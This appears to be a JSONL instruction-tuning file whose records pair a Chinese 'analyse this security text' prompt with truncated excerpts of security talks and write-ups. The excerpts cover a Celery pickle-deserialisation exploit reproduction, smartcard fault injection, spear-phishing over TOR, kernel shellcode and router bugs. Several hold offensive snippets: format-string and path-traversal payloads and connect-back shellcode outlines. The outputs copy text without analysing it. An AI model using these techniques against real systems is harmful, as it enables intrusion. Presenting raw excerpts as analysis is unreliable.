{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Celery <4.0 Redis未授权访问+Pickle反序列化利用 Celery 是一个简单灵活且可靠的分布式系统用于处理大量消息同时为操作提供维护此类系统所需的工具它是一个专注于实时处理的任务队列同时也支持任务调度 在Celery < 4.0版本默认使用Pickle进行任务消息的序列化传递当所用队列服务比如RedisRabbitMQRocketMQ等等等存在未授权访问问题时可利用Pickle反序列化漏洞执行任意代码 ## 漏洞环境 执行如下命令启动Celery 3.1.23 + Redis ```bash docker compose up -d ``` ## 漏洞复现 漏洞利用脚本`exploit.py`仅支持在python3下使用 ```bash pip install redis python exploit.py [主机IP] ``` 查看结果 ``` docker compose logs celery ``` 可以看到如下任务消息报错 ![](a.png) ```bash docker compose exec celery ls -l /tmp ``` 可以看到成功创建了文件`celery_success` ![](b.png) ## 参考 https://docs.celeryproject.org/en/stable/userguide/configuration.html https://www.bookstack.cn/read/celery-3.1.7-zh/8d5b10e3439dbe1f.md#dhfmrk https://docs.celeryproject.org/en/stable/userguide/calling.html#serializers https://www.jianshu.com/p/52552c075bc0 https://www.runoob.com/w3cnote/python-redis-intro.html https://blog.csdn.net/SKI_12/article/details/85015803", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAugust 8, 2008 Inducing Momentary Faults Within Secure Smartcards / Microcontrollers DEFCON  Las Vegas Christopher Tarnovsky Flylogic Engineering, LLC. chris@flylogic.net  http://www.flylogic.net August 8, 2008 What is a momentary fault?  Temporary forced change in behavior  The change is precisely calculated  A fault typically lasts no more than a few clock cycles  Many faults may be executed to force favorable behavior other than normal August 8, 2008 How do we do this?  Low-capacitance buffered driver  Driver is capable of driving a 1 or 0  Driver is capable of listening in Hi-Z  Low-voltage tolerant is a plus August 8, 2008 Why would we do this?  A series of changes can allow us too:  Overwrite stack-pointer  Force repeated loops in a code segment  Falsify cryptograms August 8, 2008 Inducing the fault  Physical connection to substrate  Use low-capacitance buffered driver  Tri-stated buffer is desired-  Allow eavesdropping  Overdrive at calculated point(s) in time August 8, 2008 Eavesdropping (listening) YELLOW: Databus signal GREEN: Clock PURPLE: Reset BLUE: Trigger August 8, 2008 Overdriving last slides databus with a logic 0 YELLOW: Databus signal GREEN: Clock PURPLE: Reset BLUE: Trigger August 8, 2008 Initial steps  Behavior analysis  Understand your objective (the goal)  Determine possible areas of attack  Areas such as:  Address bus  Data bus  Cryptographic blocks August 8, 2008 Address bus faults  Likely choice for cryptographic memories  Unlikely choice for microcontroller type devices  Allows complete change of data bus August 8, 2008 Data bus faults  Most probable choice of attack  Allows behavioral changes to many areas August 8, 2008 Cryptographic block faults  Limited use typically to Cryptographic Memory type devices  Can allow readout of write only keys August 8, 2008 Execution steps  Determine-  When to induce the fault  How long to induce the fault  Do we need more than one fault  Can we execute more faults on the same line  Execute the change of", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCyber Grand Shellphish DEFCON 24 August 7, 2016  Track 2 - 3pm Giovanni Vigna Christopher Kruegel zanardi void HEX on the beach UC Santa Barbara nullptr zanardi void balzaroth sicko irish SIMULATION 2004 UC Santa Barbara nullptr zanardi void balzaroth sicko irish TU Vienna void engiman pizzaman SIMULATION 2005 virus weaver marco beetal Northeastern and boston university UC Santa Barbara zanardi balzaroth sicko irish TU Vienna void nullptr engiman pizzaman odo adamd giullo voltaire bboe virus weaver marco beetal void pizzaman gianluca zardus cavedon spermachine kirat hacopo reyammer anton00b mw engiman nullptr SIMULATION 2006 - 2011 collin Northeastern and boston university UC Santa Barbara zanardi balzaroth sicko irish virus weaver marco beetal void odo adamd giullo voltaire bboe pizzaman gianluca zardus cavedon spermachine kirat hacopo reyammer anton00b engiman nullptr mw collin pizzaman acez fish cao salls subwire mossberg crowell nezorg rhelmot jay vitor SIMULATION 2011 - 2014 mw collin Eurecom ASU UC London Northeastern and boston university UC Santa Barbara zanardi sicko irish virus weaver marco beetal mossberg crowell nezorg rhelmot jay vitor void odo giullo voltaire bboe balzaroth adamd gianluca zardus cavedon spermachine kirat hacopo reyammer anton00b engiman nullptr mw collin pizzaman acez fish cao salls subwire mike_pizza donfos double acez balzaroth adamd gianluca SIMULATION 2015 Eurecom ASU UC London Northeastern and boston university UC Santa Barbara zanardi mossberg crowell nezorg rhelmot jay void odo zardus cavedon spermachine kirat hacopo reyammer anton00b engiman nullptr mw irish weaver giullo voltaire virus sicko marco beetal vitor bboe collin pizzaman fish cao salls subwire mike_pizza donfos double acez balzaroth adamd gianluca SIMULATION Modern day Eurecom ASU UC London Northeastern and boston university UC Santa Barbara zanardi mossberg crowell nezorg rhelmot jay void odo zardus cavedon hacopo reyammer anton00b engiman nullptr mw pizzaman fish c", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAPPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Michael Schrenk Las Vegas, Nevada @mgschrenk DEF CON XXIII DEF CON XXIII APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there IN ADDITION TO OTHER EXAMPLES Retail business my girlfriend & I own How we CREATE and APPLY intelligence APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there IN ADDITION TO OTHER EXAMPLES Retail business my girlfriend & I own How we CREATE and APPLY intelligence APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there You'll hear how we use competitive intelligence to: 1.) Conduct intelligence campaigns on a. Our competitors b. Our sales channels 2.) Know exactly what inventory to buy 3.) Manipulate markets APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there You'll hear how we use competitive intelligence to: 1.) Conduct intelligence campaigns on a. Our competitors b. Our sales channels 2.) Know exactly what inventory to buy 3.) Manipulate markets APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there You'll hear how we use competitive intelligence to: 1.) Conduct intelligence campaigns on a. Our competitors b. Our sales channels 2.) Know exactly what inventory to buy 3.) Manipulate markets APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there You'll hear how we use competitive intelligence to: 1.) Conduct intelligence campaigns on a. Our competitors b. Our sales channels 2.) Know exactly what inventory to buy 3.) Manipulate markets APPLIED INTELLIGENCE: APPLIED INT", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGo默认编译会自带一堆信息通过这些信息基本可以还原Go的源码架构 本文就是研究如何消除或者混淆这些信息记录了这个研究过程如果不想看可以直接跳到文章末尾 文章末尾提供了一款工具可以一键消除Go二进制中的这些敏感信息 但还是推荐看看研究过程可以明白这个工具的运行原理 从逆向Go开始 先写一个简单的程序 我的go版本是 编译 它运行后会如下输出 go version go1.16.2 windows/amd64 package main import ( \"fmt\" \"log\" \"math/rand\" ) func main() { fmt.Println(\"hello world!\") log.SetFlags(log.Lshortfile | log.LstdFlags) for i:=0;i<10;i++{ log.Println(rand.Intn(100)) } panic(\"11\") } go build main.go 可以观察到程序日志打印时打印了文件名panic抛出错误的时候堆栈的文件名也抛出了可以想象Go 编译的二进制程序内部肯定有个数据结构存储了这些信息 用IDA打开这个二进制 能够看到函数符号的名称 查看PE的结构发现有个 symtab 区段 原来普通的使用 go build . 进行编译会连符号和调试信息一起编译到里面 重新使用命令编译 再次用IDA打开发现符号信息都不见了 再次运行程序却发现文件路径信息还是存在 go build -ldflags \"-s -w\" main.go 但是自己写的代码中根本没有这些字符啊只可能是go在编译的时候自己打包进去的 所以引出两个问题 Go为什么要打包这些信息 Go打包了哪些信息 Go为什么要打包这些信息 Go 二进制文件里打包进去了 runtime 和 GC 模块还有独特的 Type Reflection(类型反射) 和 Stack Trace 机制都需要用到这些信息 来自 Go二进制文件逆向分析从基础到进阶综述 - 安全客安全资讯平台 (anquanke.com) Go打包了哪些信息 Go Version Go BuildID GOROOT 函数名称和源码路径 struct 和 type 和 interface Go逆向方式 看 https://www.anquanke.com/post/id/214940 这篇文章就能知道通过解析Go二进制中这些内置的 数据结构就可以还原出符号信息 有安全研究员发现除了可以从 pclntab 结构中解析恢复函数符号Go 二进制文件中还有大量的 类型方法定义的信息也可以解析出来这样就可以大大方便对 Go 二进制文件中复杂数据结构 的逆向分析 基于这种方式已经有人写好了ida的脚本来恢复 https://github.com/0xjiayu/go_parser 仅支持到Go1.6Go1.6之后数据结构有略微的改动但是项目还没更新 https://github.com/renzhexigua/go_parser/tree/py3_1.16 支持到Go1.6的脚本 运行这些脚本就能还原一些符号信息了 redress和gore 前面的是基于IDA的脚本因为Go也内置了自己的数据结构用Go来解析Go更方便 goretk/redress: Redress - A tool for analyzing stripped Go binaries https://github.com/goretk/redress .\\redress.exe -pkg -std -filepath -interface main.exe redress只是工具的前端如果看它代码的话会发现实际的解析代码在 https://github.com/goretk/gore 这款工具能从Go二进制中获取非常多的信息几乎可以用它来还原Go的源码结构这么神奇的工具 怎能不看看它是如何实现的呢 GoRE 代码学习 在GoRE中 PCLNTab 是直接使用内置的 debug/gosym 生成可用于获取源码路径和函数名称其他解 析数据结构的地方很枯燥有兴趣可以看@J!4Yu师傅的文章很全面的讲解了Go的数据结构 https://www.anquanke.com/post/id/214940 我就说说看得几个有意思的点 Go version 获取 go官方命令 go version 不仅可以获取自身的go版本信息如果后面跟一个Go文件路径 就能获得那 个文件的go的编译器信息 查看Go源代码看看是怎么实现的 src\\cmd\\go\\internal\\version\\version.go Go官方是通过搜索这个魔术字符用IDA定位到这个地方可以看到这个魔术字符后面就跟着Go版本 信息的地址偏移", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMetaPhish PDF Infection, Web SpearPhishing, TOR abuse & communications http://www.attackresearch.com _____________________________________ Val Smith (valsmith@attackresearch.com) David Kerb (dkerb@attackresearch.com) Colin Ames (amesc@attackresearch.com) Page 1 of 26 Last modified: 06/27/2009 Contents 1 Introduction 1.1 Abstract ..2 1.2 Background ... 2 2 SpearPhishing 2.1 Spear Phishing Concepts ... 3 2.2 Web kits, File Formats & Problems with Available Attack Code..3 3 Defining the Needs 3.1 Work Flow ....4 4 Targeting 4.1 Targeting Basics ....5 4.2 File Targeting .. .5 4.3 Why PDF's .. .6 5 Web Spear Phishing 5.1 Work Flow....7 5.2 SE and Malicious Java Applets.....8 5.3 Automation ..... 10 6 Obfuscation 6.1 Simple Obfuscation Techniques .....12 7 TOR 7.1 Using TOR as a Weapon ....13 7.2 Controlling the Exit Location 7.3 Making Any Service go Through TOR .... 14 7.4 Running Nikto and Other Web Scanners Over TOR..17 7.5 Using VPN over TOR ....18 7.6 Metasploit and TOR....18 7.7 Making an Anonymous Reverse Shell Server....18 References.... 20 Acknolwedgements .... 20 Appendix.......21 Page 2 of 26 1 Chapter 1 Introduction 1.1 Abstract Attackers have been increasingly using the web and client side attacks in order to steal information from victims. The remote exploit paradigm is shifting from the open port to the browser and email client. Penetration testers need to take these techniques into account in order to provide realistic tests. In the past several years there have been numerous presentations on techniques for specific client side attacks and vulnerabilities. This talk will focus on building a phishing framework on top of Metasploit that pen testers can use to automate phishing and increase their overall capabilities. We will also cover some techniques for SpearPhishing on pen tests, second stage backdoors, and extensive communication over TOR. 1.2 Background The authors of this paper have been involved in security auditing and penetration testing for the la", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGaming - The Next Overlooked Security Hole Ferdinand Schober Overview  Overview  Historical development  Know thy gamer  Know thy developer  Know thy engine  Profit?  Virtual Economies  Current malware  Games 2.0 & Privacy  Exercise in Exploits  The little nude patch that could  View my post and get owned  The ad from hell Clarifications  In the context of this talk:  Games = PC games  No video games (dont think about consoles!)  Dominant OS: Windows  Non-casual games  Hard-core games  Looking at the game client  Not genre-specific  No web-based games  Some issues are shared, but this is not the focus here  Limited view at online games  Think of your generic MMO (client yet again) Historical development Games (late 1990ies) Games (2008) Historical development Games (late 1990ies) Games (2008) Non-mainstream  Geeks play games  Estimated budget: 2-3M US$ 1-3 years  Self-publishing common, but declining Mass-market applications  GTA4 review in the NY Times?  Estimated budget: 15-20M US$ 2-3 years  ~3 major publishers provide funding  EA being biggest  Homogenization Historical development Games (late 1990ies) Games (2008) Custom graphics solutions  Most games still implement their own graphics engine  Only DirectX/OpenGL shared Full-featured engines  Limited group of engines (~3) used by most games, number is dropping  Includes physics, scripting, audio, AI  One exploit covers multiple games! Historical development Games (late 1990ies) Games (2008) Middleware is limited  In-game physics not really feasible yet (but getting there)  Mostly custom solutions Middleware is standard  Engines provide features, rest is done through middleware  Same as before! Historical development Games (late 1990ies) Games (2008) Physical media is king  CDs/DVDs are the distribution media Push for shared platforms that require online presence (Games 2.0)  Steam, GfW Live  Used for distribution and content protection  Platform also used for multiplayer  Automatic patching Historical developme", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking travel routers like its 1999 Mikhail Sosonkin Director of R&D Always a Student @hexlogic mikhail@synack.com http://debugtrap.com Why do this? Breaking in. Show me the bugs! The End. We all just hack for fun right? I travel a lot I work in cafes I do security things Why do this? The unboxing We want bugs! The End Peeking a few extra bytes... HTTP/1.1 200 OK Server: vshttpd Cache-Control: no-cache Pragma: no-cache Expires: 0 Content-length: 8338 Content-type: text/html Set-cookie: SESSID=eXXzgZIWg4jnnXGidAVQpRB6joaM7D7lr3IGWtz7oRuJE; Date: Sat, 24 Jun 2017 19:38:27 GMT two days* with john the ripper All this root, and no where to use it * on a reasonably priced EC2 instance If I could just...  The firmware update mechanism does not require a signed package.{  Expanded, the update package is just a shellscript \"sed '1,3d' %s|cksum|cut -d' ' -f1\"  Custom CGI server:  https://sourceforge.net/projects/vshttpd/ maybe? Its an empty project  Handles all *.csp REST Calls   Checks Firmware update  The firmware update mechanism does not require a signed package.{  Expanded, the update package is just a shellscript More details: http://debugtrap.com/2017/03/19/travel-safe/  I is C++ Buffers before function pointers Dynamic function calls Dynamic initialization/ allocation Variables before function pointers Lots of function pointers everywhere! Allocated structure Get function pointer Store the function pointer Repeat for another function Oops error leak! More details: http://debugtrap.com/2017/04/10/embedded-webserver/ Why do this? The unboxing We want bugs! The End Cybergold!  Present  Partial Virtual Space randomization  Binary and heap are fixed  Libraries and stack are randomized  Not present  Stack canaries  Full ASLR  Heap protections  Heap/Stack NX  Control flow integrity \" + \" More details: debugtrap.com/2017/05/09/tm06-vulnerabilities/ Return address on the stack Stack pointer! Restrictions with sprintf(<%s>) :  No nulls  output buffer follows <%s> format Return", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n对抗实践 目录 01 终端风控的对抗体系 02 设备指纹的对抗之道 03 设备指纹的对抗实践 04 合规挑战的适应应对 01终端风控 对抗体系 设备 指纹 智能 验证 生物探针 行为 分析 应用 加固 安全管控 终端风控态势感知系统 机器学习平台 反欺诈模型 01终端风控 风险对抗 设备 指纹 智能 验证 生物探针 行为 分析 应用 加固 安全管控 唯一 标识 模拟 器 设备 篡改 设备 伪造 群控 识别 人机 识别 本人 识别 人机 验证 机刷 对抗 黑产 工具 刷机 抹机 联防 联控 异常 行为 风险 行为 敏感 权限 隐私 数据 网络 行为 动态 加载 应用 保护 文件 保护 代码 保护 文件 操作 合规 检测 数据 加密 反调 试 数据 盗爬 hook 攻击 02设备指纹 技术原理 场景 JS SDK Android iOS SDK 浏览器类型 版本 设备型号设备名称 操作系统类型 版本 系统版本运营商内网IP 屏幕分辨率 CPU内存存储大小 canvas指纹 开机时间电量屏幕亮度 浏览器插件 模拟器等系统运行环境信息 网络环境信息 各种传感器信息 协议指纹 SSL协议指纹TCP/IP协议栈等信息 02设备指纹 技术原理 特征A 特征B 特征C 特征D 1 .组合特征 A+B+C+D 3.建 立映 射 设备精准 唯一ID 存 储 随机 算法 4.映射关系持久化 2.生成设备ID 生成 特征A 特征B 特征C 特征D 1 .组合特征 A+B+C+D 存 储 2.查找映射对应的ID 3.返回对应的device ID 还原 02设备指纹 风险画像构建 实际对抗中设备指纹技术及模型算法需有效识别出模 拟器作弊工具云模拟器改机二次打包Ap p 位 置伪造等上百种设备风险业务风控平台可选用相关标 签进行风控策略配置来有效识别并阻断恶意用户 03对抗实践 黑灰产常用的手段 B 注入攻击 hook D 群控/自动化工具 automation F 刷机/恢复出厂设置 recovery A C 应用重打包 repacking app E 多开 multiopen 模拟器/云模拟器 emulator 03对抗实践 改机作弊框架HOOK 对抗实践中可以采用通用特征识别结合特定 特征识别的方式来有效识别各类已知未 知改机作弊框架和工具对于某些隐藏特征 的高级作弊工具也可以做到精确识别 03对抗实践 模拟器云控位置伪造 实际对抗中设备指纹需具备系统特征识别协议指纹识别和C PU指令探测等通用的模 拟器识别算法来有效识别各类已知和未知的终端模拟器云模拟器 常见品牌模拟器如夜神雷电Mumu逍遥andyroid 云模拟器红手指海马云 Anbox/虚拟大师/blissOS 03对抗实践 群控设备农场 示例 群控监测 设备指纹检测特定作弊工具 操作状态输入速度传感器状态 策略 & 无监督聚类 03对抗实践 M1芯片终端 M1之于业务的挑战 真机运行ipa 风控之于M1的对抗 识别M1真机M1模拟器 02对抗实践 其他典型对抗 多开/分身区分软件多开和系统多开 备份恢复/抹机恢复相似度算法+黑科技 定制rom检测检测到黑产ROM会有特殊规则输出风险标签 刷机检测设备疑似刚刷过机典型特征应用数量少开机时间短存储空间利用率极低等 逆向对抗数据结构加固vmp保护js动态更新ast混淆 03对抗实践 典型有意思的业务思考 非本机恢复的思考 任意两部相同型号相同系统版本的设备通过备份克隆APP生成不同的设备指纹 逻辑上需要生成两个ID有些业务想生成相同ID业务上可以结合用户设备的一些字段比如特别是设备名称网 络已占用的存储之类的 是可以配合来确认是否是同一个用户 网络信息异常 网络参数不合逻辑如网络类型为Wi-Fi但Wi-Fi为未连接状态Wi-Fi基站IPVPN IP相同 改机检测与虚假设备 改机检测有可能没有实际发生参数篡改虚假设备是发生篡改后的 03对抗实践 典型的终端风控模块 生物探针 智能验证 行为分析 安全管控 应用加固 安全清场 是不是本人 是不是真人 传感器数据 按压力度数据 操作链路数据 行为轨迹数据 设备维度数据 其他非敏感数据 加速度传感数据 陀螺仪传感数据 磁场传感器数据 滑动行为数据 按压力度数据 设备纬度数据 传感器特征模型 传感器时序模型 行为习惯模型 行为特征模型 生物探针技术 用户画像 生物特征模型 AI对抗+干扰+模型+终端风控 基底+画像 04合规挑战 适应与应对 安全 合规 数据安全 隐私合规 敏感数据 合法采集 系统限制 最小采集 去标识化 合规流程 算法优化 主被结合 联防联控 自适应性 风险 对抗 最小 采集 冷热 并用 去标 识化 主被 结合 终端 风控 跟随宿主权限最小化采集 不要求敏感权限GPS定位手机状态 不依赖敏感", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWindows_Kernel_Shellcode _Exploit chrO.ot Nanika Summary  What is Exploit  Windows_Shellcode  Windows_Kernel_shellcode  CreateRemoteThread backdoor byshell  Exploit Demo  0day_exploit What is Exploit  Buffer overflow  Heap overflow  Format string  CGI or SQL inject Buffer overflow STACK ---------------- Local Variables ESP Buffer ---------------- EBP-> Old Value of EBP ---------------- Return Address ---------------- void func(void) { char buffer[256]; // * for(i=0;i<512;i++) buffer[i]='A'; // ! return; } Heap overflow  mov [ecx], eax  mov [eax+4], ecx buf1 = HeapAlloc(hHeap, 0, 32); strcpy(buf1,mybuf); buf2 = HeapAlloc(hHeap, 0, 32); HeapFree(hHeap, 0, buf1); HeapFree(hHeap, 0, buf2); Format string int main(int argc, char *argv[]) { char buffer[512]=\"\"; strncpy(buffer,argv[ 1],500); printf(buffer); return 0; } printf %.123456x%.123456x%n CGI or SQL inject  ../../../../../../  !@#$%&*()  http://127.0.0.1/a.asp?s=xxxxx Windows_Shellcode  bind shellcode  connect back shellcode bind shellcode  編碼  Kernel 基址定位  API函數address定位  Create Shell  WinSocket  產生TCP協議參數為押入堆疊6,1,2  Bind;綁定一個Port來做通訊  Listen;等對方連結  Accept;連結成功  Send;發送  Recv;接收 connect back shellcode  db \"WSAStartup\",0;edi-14h  db \"socket\",0;edi-10h  db \"connect\",0;edi-ch  db \"send\",0;edi-8  db \"recv\",0;edi-4 Windows_Kernel_shellcode  patch EPROCESS Token  APC inject  Kernel Memery  Kernel struct  IRQL  Patch EPROCESS Token  APC_Inject Kernel Memery Kernel struct  EPROCESS  KPROCESS  ETHREAD  KTHREAD  HANDLE TABLE dt nt!_EPROCESS dt nt!_KPROCESS dt nt!_ETHREAD dt nt!_KTHREAD dt nt!_HANDLE_TABLE IRQL High Power Fail Inter-processor Interrupt Clock Dispatch/DPC Device n Device 1 APC Passive ... 31 30 29 28 0 1 2 Hardware Interrupts Software Interrupts Normal Thread Execution IRQL = Interrupt Request Level (0 to 31) IRQL = Interrupt Request Level (0 to 31) Patch EPROCESS Token +0x000 Pcb : _KPROCESS +0x084 UniqueProcessId : Ptr32 Void +0x088 ActiveProcessLinks : _LIST_ENTRY +0x0c4 ObjectTable : Ptr32 _HANDLE_TABLE +0", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Gh0st in the machine (forensic,60p) > mY CoMputEr IS ActIng uP. cAn yOu heLP mE? > Flag format: BITS(WORDS.IN.CAPS) In this task we were given a pcap containing two minutes worth of keyboard USB capture. Apart from the actual keystrokes (which turned out to spell link to Rick Roll video...), there were some packets going from the host to the keyboard. They contained only a single byte, alternating 0x01 and 0x03. As we soon found out, these bits correspond to keyboard state, and the changing bit meant Caps Lock status. This was consistent with challenge description, which had some problems with letter case. We rememembered a recent article about exfiltration of data using those LEDs and thought this could be used here as well. so we wrote a quick script (parse3.py), calculating a difference between times the Caps Lock is turned on and off. They seemed to follow a certain pattern, and we soon thought it could be Morse code. We treated 300ms or longer pulses as dash and shorter as a dot, and using online morse converter gave us something close enough to flag (we had to guess two characters).", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRevolting Radios Get it? Its a pun! Thanks Mike Walters Ang Cui Schuyler St. Leger Taylor Streetman Sergey Bratus Travis Goodspeed A little background One of the things that makes Orwell's '1984' scary is the way it uses technology. In Orwells dystopia, tech is a one-sided means of control. The powers that be use machines for pervasive surveillance, to weaken your sense of self and to make real change feel impossible. Humans deprived of any private space are uniquely vulnerable, and Big Brother knows it. - DEF CON 26 theme Lets over-commit to that theme. - Mike & Dominic Who are we? Michael Ossmann Founder and CEO of Great Scott Gadgets Dominic Spill Security Researcher at Great Scott Gadgets Breadboard SDR Scenario Weve found that we can reprogram one of Big Brothers telescreens and stream samples from the auxiliary Analog to Digital Converter (ADC) in its microcontroller. Can we build a radio receiver out of this microcontroller? Breadboard SDR When you build a radio in software, you dont need much hardware Clock Signal Transmitters Scenario We need to exfiltrate data from one of Big Brothers air-gapped networks. We have an ally but no radio transmitter inside. Can our ally reprogram a microcontroller on the inside to transmit data over the air? Toggling IO Pins Mieks OOK transmitter https://gfycat.com/gifs/detail/cloudyinfamouscapybara Ang Cuis Funtenna http://www.funtenna.org/CuiBH2015.pdf Raspberry Pi FM https://github.com/PNPtutorials/FM_Transmitter_RPi3 GreatFET One PLL Transmitter Real World Radios Our demonstration target used a frequency deviation of +/-25 kHz and a center frequency of 315.005 MHz. We transmitted with a frequency deviation of +/-50 kHz at a center frequency of 315.050 MHz, and it worked! If it oscillates like a radio and emits like a radio Its a radio GPIO Pin Receiver Scenario Big Brother has updated telescreens to a new version without an Analog to Digital Converter (ADC) and has restricted distribution of ADCs in an effort to prevent im", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nI Know What You Are By the Smell of Your Wi-Fi Denton Gentry @dgentry denny@geekhold.com Were here today to talk about a mechanism which identifies the type of device connecting to a Wi-Fi network. It can be quite specific: it can tell the difference between an iPhone 5 and an iPhone 5s, between a Samsung Galaxy S7 and an S8, between a Withings scale and a Nest Thermostat. Classically, this kind of client detection would be called fingerprinting like the OS fingerprinting mechanisms in nmap. However, in modern usage the term fingerprinting has evolved to mean identification of specific users, such as browser fingerprinting to identify a specific individual. As the mechanism discussed here identifies the species of the device, not the unique individual, we refer to it as Wi-Fi Taxonomy. 0:50 Try It! 1% 10% Poll: Wi-Fi at DEFCON for a demo 89% bad idea. worst idea. what could go wrong? SSID: SmellOfWifiTalk You can try it! Joining SmellOfWifiTalk will print the systems estimation of what your device is, for however long a rogue Wi-Fi network lasts at DEFCON. It will be printed in that terminal window up on the screen. 0:30 MAC Sublayer Management Entity (MLME) Probe Request: Asks nearby APs to respond. Association Request: join the Wi-Fi network Probe Request Association Request Probe Response Association Response Try It! SSID: SmellOfWifiTalk The mechanism works by examining Wi-Fi Management frames, called MLME frames. These frames are used to join, leave, and configure the Wi-Fi network. They are not TCP/IP packets, they are not routable and they do not leave the Wi-Fi network. Well focus on two specific frames: 1. Probe Request, where a client can ask all nearby APs or one specific AP to respond. The client includes information about itself and its capabilities in the request, and the AP can respond with its own capabilities in the response. 2. Well also look at the Association Request, when a client joins a Wi-Fi network. The client includes many of the same capab", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents Stalloris: RPKI Downgrade Attack Tomas Hlavacek, Philipp Jeitner, Donika Mirdita, Haya Shulman and Michael Waidner #BHUSA @BlackHatEvents Information Classification: General Team  Tomas Hlavacek  Donika Mirdita  Haya Shulman  Michael Waidner Cybersecurity Analytics and Defences departement  Network Security  Routing and DNS Security  Philipp Jeitner  Network Security Researcher  Just finished my PhD #BHUSA @BlackHatEvents Information Classification: General Outline  BGP & BGP Security  Ressource Public Key Infrastructure (RPKI)  Downgrade attack against RPKI  Feasability  Mitigations #BHUSA @BlackHatEvents Information Classification: General BGP  Routing system of the Internet  Networks (ASes) announce the IP prefixes they have  Neighbors forward these announcements  Everyone knows where to send traffic AS 64496 AS 64511 AS 64499 traffic 198.51.100.0/23: AS64511, AS64496 198.51.100.0/23: AS64496 #BHUSA @BlackHatEvents Information Classification: General BGP Hijacks  No built-in security  Just announce a prefix you do not own, be MitM, profit? AS 64496 AS 64511 AS 64499 198.51.100.0/23: AS64496 198.51.100.0/24: AS64511, AS666 AS 666 198.51.100.0/24: AS666 traffic #BHUSA @BlackHatEvents Information Classification: General RPKI  Systematic approach to BGP Security  Certificates: Address block -> ASN  Called Route Origin Authorization (ROA)  Root of Trust: RIRs  Because RIRs allocate address blocks!  Kind of like getting your TLS cert from the registry { \"asn\": \"AS64496\", \"prefix\": \"198.51.100.0/24\", \"maxLength\": 24, \"ta\": \"RIPE\", } #BHUSA @BlackHatEvents Information Classification: General Route Origin Validation  Now everyone has ROAs  (actually only 34.2%)  How to check them?  Put them into BGP?  Third-party system! 198.51.100.0/24: AS666 ROA: AS64496 owns 198.51.100.0/24 #BHUSA @BlackHatEvents Information Classification: General RPKI works! #BHUSA @BlackHatEvents Information Classification: General Attacking RPKI  Integrity?  Create Malicious ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTeaching Old Shellcode New Tricks DEF CON 2017 @midnite_runr Whoami  US Marine (out in 2001)  Wrote BDF/BDFProxy  Co-Authored Ebowla  Found OnionDuke  Work @ Okta  Twitter: @midnite_runr Why This Talk  Its fun  Its time to update publicly available shellcode Outline  Some History  Introduced Methods  Mitigations and Bypasses Part I - History Stephen Fewers Hash API  SFHA or Hash API or MetaSploit Payload Hash  Introduced: 8/2009  Uses a 4 byte hash to identify DLL!WinAPI in EAT  JMPs to the WinAPI ; return to payload  Some code borrowed from M.Millers 2003 Understanding Windows Shellcode paper http://blog.harmonysecurity.com/2009/08/calling-api-functions.html Typical SHFA Based Payload [SHFA][the actual payload logic] Typical SHFA Based Payload [SHFA][the actual payload logic] 1 Typical SHFA Based Payload [SHFA][the actual payload logic] 1 2 Typical SHFA Based Payload [SHFA][the actual payload logic] 1 2 3 Typical SHFA Based Payload [SHFA][the actual payload logic] [some winAPI] 1 2 3 Typical SHFA Based Payload [SHFA][the actual payload logic] [some winAPI] 1 2 3 4 Typical SHFA Based Payload [SHFA][the actual payload logic] [some winAPI] 1 2 3 4 5, Continue to 2 until done Defeating SFHA  EMET  Piotr Bania Phrack 63:15 // HAVOC - POC||GTFO 12:7 EMET Caller/EAF(+)  EAF(+)  Introduced: 2010/2014(+)  Protect reading KERNEL32/NTDLL and KERNELBASE(+)  Caller  2013  Block ret/jmp into a winAPI (Anti/rop) for critical functions EMET is EOL  Supported through July 31, 2018  Still works**  Re-introduced in Windows RS3 ** Depends on threat model Tor Browser Exploit vs EMET Bypassing EMET EAF(+)  2010: Berend-Jan Wever (Skypher Blog) - ret-2- libc via ntdll  1/2012 Piotr Bania - Erase HW Breakpoints via NtContinue  9/2014 - Offensive Security - EAF+ bypass via EMET function reuse calling ZwSetContextThread directly http://web.archive.org/web/20101125174240/http://skypher.com/index.php/2010/11/17/bypassing-eaf/ http://piotrbania.com/all/articles/anti_emet_eaf.txt https://www.of", "category": "text_analysis", "source": "security_papers"}
